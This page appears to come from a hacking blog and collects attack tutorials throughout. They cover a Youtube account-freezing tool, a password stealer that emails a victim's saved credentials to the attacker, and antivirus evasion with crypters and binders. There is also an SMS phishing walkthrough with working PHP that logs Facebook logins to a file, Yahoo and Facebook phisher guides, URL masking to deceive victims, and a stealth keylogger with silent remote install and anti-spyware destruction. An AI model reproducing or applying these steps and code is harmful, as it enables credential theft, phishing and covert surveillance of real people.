Design your theme




How to Hack Youtube account:

1. Download Youtube Freezer - software to hack Youtube account.
Password: www.realhackingtips.blogspot.com

2. Unzip the zipped file in downloaded file using Winzix (free download here) to get Youtube Freezer on how to hack youtube account.

3. Now, run the unzipped file and you will see something like this:



4. From drop down box, select Youtube. Simply enter the username whose you want to hack youtube account and hit "Freeze".

5. Youtube Freezer will start constant login attempts and thus freeze and hack Youtube account. To stop freezing, hit Stop Freezing or close the youtube hacking software - Youtube freezer.

Thus friends, you are able to hack youtube account using this Youtube freezer.





Windows Live password stealer,
I am now writing this article on Password stealer download to inform you about one more efficient Live password stealer - Ref Stealer. This windows live password stealer is amazingly working cool. Just read on.. I have provided link for software download.


Email and Windows Live Password Stealer:

This Windows Password Stealer is used to steal all stored passwords on victim computer. When victim opens our sent Windows Live Password stealer on his computer, the password stealer searches for all saved passwords on victim computer and then simply sends those saved passwords alongwith userids to you via email. Thus, you are now equipped with victim email, ids and passwords and can easily hack his email accounts.

Note: This password stealer though named Windows Live password stealer, works for all available email accounts and not only restricted to windows live.


How to use Live password stealer???

1. Free Download Windows Live password stealer to steal victim passwords.
Password: realhackingtips.blogspot.com

2. Run "Ref Stealer.exe" file to get something like:



3. Now, fill in your Gmail Username and password. Tick on checkbox below the password field. Assign name to the server as you want. Hit On "Gmail Check" to check whether you've entered Gmail id and password correctly. If you receive an email, you've done it right and now hit on "Build" to get server.exe ie password stealer server created in current directory.

4. Now, simply bind this password stealer server to any file using Binder software and send this file to the victim. You can refer my article How to send server file to victim for more information on how to send windows password stealer server file.

5. Once the victim runs our sent binded file on his computer, windows live password stealer will search for all stored passwords and send you email containing all user-ids and passwords like this:



6. Thus, now you have all victim email passwords in your inbox and you can now hack victim email accounts easily. Thus, Windows Live password stealer is used to hack email passwords.

Note 1: This password stealer server is detected as virus during runtime. But, its 100% FUD(Fully Undetectable) during scantime. So, you can use Crypter or use Binder trick I've explained to get rid of antivirus detection. Or you can simply use Hexing method which removes virus signature and our virus becomes undetectable.

Update:Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use bestHacking software- Winspy Keylogger which is FUD(Fully UnDetectable). This is personally recommended keylogger from Techotips.

Note 2: If you want to try out this windows password stealer on your own computer, first installDeep Freeze software and then try this hack to prevent possible damage to your computer.

So friends, enjoy this
windows live password stealer download
to hack email passwords. I have tried my best to keep this windows live password stealer tutorial simple. If you have any problem in using Windows live passwords stealer to hack windows password, please mention it in comments.

Enjoy Windows live password stealer download to hack email password...





I have heard a lot of news regarding sms phishing but didnt found any tutorial explaining this. So, i decided to write a tut to share knowledge about this. Any mistakes are regretted and suggestions and comments are welcomed! Hope you like it.


Note: This tutorial is written for educational purposes only and I take no responsibility for any consequences you suffer for executing this.


Here we are making fake mobile login of facebook.


What happens?
Victim receives a sms on his mobile apparently from facebook asking to try out new version of facebook. A link is provided in the sms. The victim opens the link, sees the facebook login page. He makes the login and it shows username/password is wrong. He gets phished...


To proceed ahead, you need to have a web server running on your computer connected to internet and mobile number of the victim.


Process:


SETTING UP YOUR PHISHING PAGE.
Go to http://m.facebook.com/ and copy the source code. Place it your web server's public html folder with ".htm" as extension. Open this html file in notepad and go to the form tag. In that, replace the form method from POST to GET. Change the form action value to write.php (you can change the name if you want). Rename the file as "index.htm". Create another file and name it as "write.php". Open write.php and copy the following content to the same. Save it.






Code:
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");fclose($handle);
exit;?>


 Also create another file pswd.txt and leave it as it is. This is the file where our usernames and passwords are getting stored.
You can store these files in any directory under public html. Remember to keep the name of directory something like facebook or similar.
Now start the server.


CHECKING IF OUR PHISHING PAGE IS WORKING.
go to cmyip.com to know your ip address. Paste this ip address in address bar. You should see your phishing page or your default index.htm(if the files are stored in any directory under public html). If not, following maybe the reasons for it:
1. You maybe behind a router. So, you need to open router's settings and enable port forwarding to your machine.
2. Your server maybe configured not to allow any outside connections. So, check out access settings and enable outside connections.
3. Your server may not be running properly.
Now, you need to navigate to the directory in which our phishing files are stored. for example, my files are in /smsphish under public html. So, i'll navigate to...
http://myipaddress/smsphish/
There you can see the fake login of facebook. You can enter any fake stuff in username and password field. Press enter. It should redirect you to the actual facebook mobile site. Now, open our pswd.txt file and see if our entered details are logged there. If they are, our work is mostly done. if they are not, check that you have made necessary changes in index.htm and the write.php is not tampered.
Now nearly 90% work is done. We move to the last step...




SENDING THE SMS.
Now you have to find free smsing sites which do not require to register. These sites use their own number for sending messeages. You can find many such sites. One word: Google. Now here comes our social engineering techniques. Just type the message like "Experience the brand new, more secure version of facebook, simply follow the link,.. blah blah" and give link to our phishing page. A sample message would look like this.


Quote
Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://youripaddress/yourdirectory/
-Facebook development team.
You can think of many more luring techniques... just think!
Enter the victim's mobile number and send the message! (recommended use proxy) If he opens the message and link, he will see the normal facebook mobile login and if he enters the correct details, our phishing worked! just keep watch on pswd.txt for their details!

Note: Be careful when running server!





In my article How to hack email account by phishing, i mentioned about use of Email phishing to hack Yahoo email account password. I was asked by a reader via comment to post an article on How to
hack Yahoo account password
using Yahoo phishing. So, I am writing this security article to inform you about use of Yahoo Phishing to hack Yahoo password. I have even provided link for software download... just read on.



Hack Yahoo account password:

1. First usual step of Phishing is to get Yahoo phisher(fake Yahoo page to hack Yahoo password). Refer my article Software to hack Yahoo password for more info on how to hack yahoo password using yahoo hacking software.

2. I have mentioned about Yahoo hacking software to create Yahoo Phisher alongwith software download link. Just enter http://www.yahoo.com/ over there and you'll obtain yahoo phisher.

3. Now, when you have Yahoo phisher, upload this Yahoo phisher to free webhost or webhosting service say t35.com.

4. Send Index.htm page of Phisher to victim in his inbox and ask him to login to his Yahoo account by using our sent Yahoo Phisher. As victim tries to login to his Yahoo account by entering Yahoo password on our Phisher, you are able to hack Yahoo password.

5. Simply, go to your webhost dashboard and you'll find "passes.txt" file created which will contain victim Hacked Yahoo password.... thus you are able to hack Yahoo password.

Just refer my article How to create and use Yahoo phisher where I have explained in-depth Yahoo Phishing tutorial to hack Yahoo password.

So guys, I hope you are now able to hack Yahoo account password using Yahoo phishing. I have tried to keep this
Yahoo Phishing tutorial to hack yahoo password
as simple as possible. If you have any problem in using Yahoo phishing to hack Yahoo password, please mention it in comments.

Enjoy n hack Yahoo password...





I am now,
hacking Facebook password.
I have written about Facebook Freezer for hacking Facebook account. But, it does not help you in
hacking Facebook password.
So, I am writing on hacking Facebook password using Facebook Phisher in this article.



What do you think is above page?? Facebook login... No friends. Its a Facebook Phisher used for hacking Facebook passwords.

Note:The article is for educational purpose only. Remember, Phishing is legally offensive. I am not responsible for any action done by you.

Hacking Facebook password:

Facebook Phishing is one of the most preferred method used for hacking Facebook password.

1. Free Download Facebook Phisher for hacking Facebook password.

2. Unzip the downloaded file using Winzix (free download here) to obtain Facebook phisher to hack Facebook account.

3. The downloaded file contains:
a. Index.html
b. write.php

4. Upload both files to any free webhost like http://www.yourfreehosting.net/.

5. Now, send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.

6. Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in "passes.txt". This file is created in your webhost control panel as shown.




If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.

7. Now, open passes.txt to get hacked Facebook id and password as shown.





Update:Some readers got problems while doing this hack of Phishing and hence I have written articlePhishing Simplified to solve most commonly asked questions. Refer it to solve your problems, if any.

So friends, I hope you can use this Facebook Phisher for
hacking Facebook password.
If you have any problem in using this Facebook Phisher for hacking Facebook password, please mention it in comments.

Enjoy Facebook Phishing for hacking Facebook passwords...





Download Free Avhackers Phisher maker 3.1.0




Avhackers Phisher maker 3.1.0 FULL RELEASE

Features:
1. Fastest phisher maker tool ever
2. Makes phisher for almost any site
3. Only 3 steps to make phisher [1,2,3 and go]
4. Useful for users who dont knows HTML, PHP coding
5. No manual work except entering URL of website, for which u want to make phisher.
6. Fully automated tool
7. Small in size.
8. Progress bar is provided.
9. Instant access to phishers you created.

Requirements:
.NET framework 2.0 is required.


Download here: [1.56 MB]







Hide/Mask a url:

Consider you have hosted your phisher page and your phisher link is something like:
http://www.realhackingtips.blogspot.com/

So, whenever victim checks out this link, he will find the link suspicious. This can be detrimental for our hack. So, the best way is to make this link less suspicious i.e. to hide/mask the url.

1. So, go to Dot.tk to hide a url.

2. Enter your phisher link in the textbox and hit on Next.


3. Enter the link you want to rename your phisher link to.


4. Now, you can send this masked phisher link to your victim. The victim will now find our phisher link less suspicious as we have hidden the actual phisher link using .tk domain.

So friends, I hope you are now able to hide a url using this url masker service.If you have any problem in this tutorial on
how to hide/mask a url,
please mention it in comments bellow.

Enjoy the .tk domain to hide a url...



Win-Spy Monitor Keylogger Features:

1) What is Win Spy Software?

WinSpy is a Complete Stealth Monitoring Software that can both monitor your Local PC and Remote PC. Win Spy Software operates in stealth mode. Win-Spy will not show in Add/Remove Programs, Windows Start, Taskbar, Task Manager, Processes or in Program Files Folder. Win-Spy can either be used for you Home or Office.

Win-Spy is a complete Local and Remote monitoring package that includes everything below for one low price: Breakdown is as follows:

Local PC Monitoring comes with:

Screen Capture
WebCam Shots
Keylogger
Emailer for Keylog, Screen Capture and Reports
Keylog Alert with Emailer 

Reports - WebSites Visited Summary
- Websites Visited Detail
- Time On Internet
- Dual Side Conversations
- Unauthorized Login Attempt

Folder Hider
Clear All Tracks Utility
Secure File Deletion Utility
Lost or Stolen PC Tracker
Anti-Spy Disable / Destroy
Anti Virus Stealth Technology
Web-Cam via Internet Explorer
Remote Deployment/Monitoring
Suspend on Idel
Monitor across networks
WebAccess to all screen shots and reports


Remote PC Monitoring comes with:

Screen Capture
WebCam Shots

Reports - Keylogger
- Time on Net
- Websites Visited Summary
- Websites Visited Detail
- Dual Side Conversations

Emailer for Keylog, Screen Capture and Reports
Streaming Web-Cam (View / Record)
Remote Mic (Record / Listen)
Remote PC file Browser and FTP
Remote PC file Download / Uploader / Execute / Delete
Remote PC Shutdown / Log Off
Send Message to Remote PC
Anti-Spy Disable / Destroy
Anti Virus Stealth Technology
3 remote file deployment - combine, exe and excel
3 ways to obtain remote information - email, direct connect, ftp
3 methods to for remote uninstall - auto, direct connect, via uninstall file
Monitor up to 5 remote PC with 29.95 version
Suspend on Idel
Centralized Monitoring
Save information across network
Auto Config XP Firewall
WebAccess


2) How does Win Spy Software work?

Win Spy Software accomplishes two tasks in monitoring your computer. Spy Software
a) It captures screen shots of the computer.Spy Software
b) It captures all keys typed on the keyboard.
c) It captures all chat conversations.


3) How do I Install and run Win Spy Software?

Run the Win Spy Software Setup.exe file. You will be prompted to enter a username and password. Enter any Username and Password. You will use this Username and Password to Login into Win Spy Software. Note that username and password are case sensitive. Restart your computer. Press Control and SHIFT and F12 keys to login.


4) How do I Uninstall Win Spy Software?

You will have to enter your username and password to uninstall Win Spy Software.Spy Software
Users will not be able to uninstall Win Spy Software without a username and password.Spy Software
Press CONTROL - SHIFT - F12 keys, at login dialog enter your username and password press the uninstall button.


5) How do I access Win Spy Software in windows?

To login into Win Spy Software you will have to use the CONTROL - SHIFT - F12 keys.


6) Does Win Spy Software start automatically when windows start?

Yes, Win Spy Software automatically starts every time you start windows.


7) Will users know if Win Spy Software is running?

Win Spy Software will not appear in Add/Remove Programs, Windows Start, Taskbar, Task Manager, Processes or in Program Files Folder.on the task manager or windows toolbar.


8) Can users uninstall Win Spy Software?

You will have to enter your username and password to uninstall Win Spy Software.pare
Users will not be able to uninstall Win Spy Software without a username and password.Sp
Press CONTROL - SHIFT - F12 keys, at login dialog enter your username and password press the uninstall button.


9) Can users stop Win Spy Software from running?

No, Win Spy Software does not appear on the task manager. Users will not be able to stop Win Spy Software program.


10) Can I save Screen Capture and Key Recorder files across the network?

Yes, Win Spy Software allows users to specify location to store the ScreenCapture and Key Recorder files.


11) Can Win Spy Software email me the Key Recorder file?

Win Spy Software has the option to mail the Key Recorder file to any e-mail address that supports SMTP mail (example: Yahoo). The file is emailed whenever the user connects to the internet.


12) Can Can win-spy email me the keylog file when certain keywords are found?

Yes, win spy has a Keyword Alerter that will secretly email the keylog to me, when keywords or phrase I specify are found in the keylog.


13) Does Win-Spy uses outlook or other email programs to send emails?

Win Spy works independetly. Win spy does not depend on outlook or any other email programs to send mail.


14) Is Win Spy dependent on PC email address? 

No, Win Spy works independetly. Win spy does not depend on PC email address .


15) Is Win Spy dependent on PC email program? 

No, Win Spy works independetly. Win spy does not depend on PC email program/software.


16) Will sent mails show in outbox? 

No, Win Spy works independetly. Sent mail will not show in outboox.


17) What email provider should I use to RECEIVE my keylog? 

Use any email provider that supports SMTP mail. Try Yahoo, it might work depending on your region. Do not use AOL or Hotmail to receive keylog file. AOL and Hotmail does not support SMTP mail. Note, it does not matter if the PC you are monitoring uses AOL, what matters is where you want to receive your email.


18) Can I Hide any folder in windows using Win Spy Software? 

Yes, with Win Spy Software you may select any window folders to hide. Win Spy Software has the option to disable windows “View Folder Option” making hidden folders totally un-access able by users.


19) What is Win Spy WebCam?

Win Spy webcam when turned on will allow you to access your PC webcam via the internet using IE.
So if you were at work, you can use your work PC to monitor what is going on at home?
Just turn your browser on and enter your IP home address. You will not need to install anything on your work PC.for webcam to work. Pictures are in realtime.


20) What is Win Spy Clear Tracks?

Win Spy clear tracks is a utility that allows you to quickly clear Internet and Windows tracks on your computer with a click of a button.

Clear Tracks Clears the following:
Internet Cookies
Internet History
Internet AutoComplete
Internet Temporary Files
Internet Index files.
Windows Recent Document
Windows Search History
Windows Run History
Windows Temp Files
WindowsApplication Recent Cache
Windows Recycle Bin


21) What is Win Spy Secure File Folder Deletion/Eradicator?

Secure File Deletion allows you to securely delete a file or folder. Files/folders deleted are gone forever.
Win Spy’s Secure Deletion rewrites to the file and deletes the files 25 times.
Win Spy’s Secure Deletion exceeds US Department of Defense standards for file deletion(DOD 5220.22).


22) What is Win Spy PC Tracker?

In an event your PC is Lost or Stolen. When the user of your PC connects online.
Win-Spy PC Tracker will secretly email you your location to you.

Location Info includes:
Host IP:
Computer Name:
Computer Time:
Server IP:
Server Name:
Server Time:
OS Type:
OS ID:
RegisteredOrganization:
RegisteredOwner:
Computer ID:
IP Configuration Info:
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address
Subnet Mask
Default Gateway


23) How do I locate my PC with info above?

1) go to http://www.arin.net/whois/
2) enter this IP address to get contact information for server or router which was used to connect to the Internet;
3) contact management of this server and provide them with connection time and IP address.
The management can check records in server's log and determine the name and street address of the person who is using the computer.
In most cases the management don't reveal such kind of information to a private party so police assistance is required.


24) What is Win Spy Anti-Spy?

Win Spy Anti Spyware will actively and continously disable or destroy any attempts by user to install or run anti spyware on your PC. This option can be turned on or off in Tools / Misc.


25) Can Win Spy be detected by Anti Spy software?

Win Spy has 2 technologies built in to avoid detection by Anti Spywares.
1) Win Spy's Anti Spy when turned on will actively and seek and destroy Anti-Spy Softwares.
2) Win Spy incorporates random filenames for most of its program files.


26) What Reports can Win-Spy produce?

1) Websites Visited Summary Report - by username and time
2) Websites Visited Detail Report - by username and time
3) Hours Spent On Internet - by username and date
4) Login or attempts by username
5) Chat room conversations
6) Keylog or anything typed on PC


27) Does Win-Spy record chat room conversations?

Yes, Win-Spy will capture Screen Shots and anything Typed in chatrooms.


28) Will Win-Spy work across firewalls?

Yes, Win Spy will work across firewalls. Important, See below.


29) Will Win-Spy penetrate/hack through Firewalls?

No, Noticed the way we asked the question above.
Most vendors would stop at with the question above, making you believe their product would penetrate firewalls. There are currently no over the counter product that would penetrate firewalls. If there was, corporate America would be broke. If anyone is claiming to be able to do this, ask them for a evaluation copy.


30) Can Win-Spy Auto Configure XP Firewall?

Yes, you can set win-spy to automatically configure XP firewall settings for you.


31) What is Win Spy Remote?

Win-Spy Remote you will be able to monitor activities on the Remote PC in real-time.
You will be able to:

1) View Screen Captures
2) View Keylog file
3) View ChatRoom Conversations report
4) ViewTime Spent Online report
5) View Websites Visited report
6) Browse all files and folders on remote PC.
7) Run, Delete files and folders on remote PC.
8) Upload and Download files to/from remote PC.
9) View remote PC Webcam in realtime/streaming.
10) Record remote PC sound (mic) conversations.
11) Email remote PC reports to my PC.
12) FTP remote PC reports and screen shots to my PC.


32) How does remote Install work?

Use Remote Install and create a remote file.
Send remote file to your remote PC through email.
When the user clicks on the file it would silently install Win-Spy.
If a picture is included then the user would see the picture and not be aware that win-spy is being installed.
If no picture is included then when user clicks on the file it would appear as nothing has happened.


33) How do I Monitor a Remote PC?

Step 1 - Create Remote File using Remote Install.
Step 2 - Send Remote File to your Remote PC using your email.
(When remote user clicks on remote file win-spy will silently install.)
Step 3 - Use Remote Viewer to view content/monitor remote PC.


34) How do I create a Remote Install File? 

You would use Win Spy Software’s Remote Install File creator under Remote to create the remote install file.


35) What information will I receive from the remote PC?

Win-Spy Remote you will be able to monitor activities on the Remote PC in real-time.
You will be able to:

1) View Screen Captures
2) View Keylog file
3) View ChatRoom Conversations report
4) ViewTime Spent Online report
5) View Websites Visited report
6) View remote PC Webcam in realtime/streaming.
7) Record remote PC sound (mic) conversations.


36) How do I obtain the information from the remote PC?

Only Win-Spy gives you 3 methods of retriveing data from remote PC..
1. Connect to remote PC and retrive data/reports
2. Get remote PC E-mail reports directly to you
3. FTP remote PC’s reports/screen shots to FTP server


37) What is emailed from remote system that you are monitoring?

ScreenShots, Keylog, WebsitesVisited, TimeOnline and ChatConversations Reports are emailed.


38) What is FTP from remote system that you are monitoring?

All reports and screen shots are ftp.


39) Will Win-Spy remote work with Dial-up?

Yes, Win-Spy will work with dial up or high speed connections.


40) How would you know that the other user is on line?

Win-Spy will inform you with popup, like msn messenger program.


41) Will Win-Spy work with Dynamic IP on remote PC?

Yes, Win-Spy manages the IP. Works like the same concept as msn messenger. You will not need the remote PC's IP to connect to it.


42) What browsers are compatible with Win Spy?

Win Spy is compatible with Internet Explorer 5.5 and above.


43) What is the purpose of Seek and Destroy Anti-Spyware?

Win Spy seek and destroy will prevent users from installing or running any Anti-Spy software. The purpose of this is so that users will not be able to remove Win-Spy. After all, what is the point of having a monitoring system if your child can easily install an Anti-Spy software and remove Win-Spy.


44) What dual-side chatrooms conversations will win-spy montor?

Win-Spy Records Dual Side Chat On the following Chat Rooms."
Yahoo version 6.0.0.1750
ICQ version 2003b Build 3916
AIM version 5.1.3036
MSN version 7.0.0425
Trillian version 0.74 w/patch 1






Download Winspy Keylogger (Originale provider price : $39)



If u want Winspy kelogger for only $15 then purchase here 



Total Pageviews

Recent Comments

Recent Posts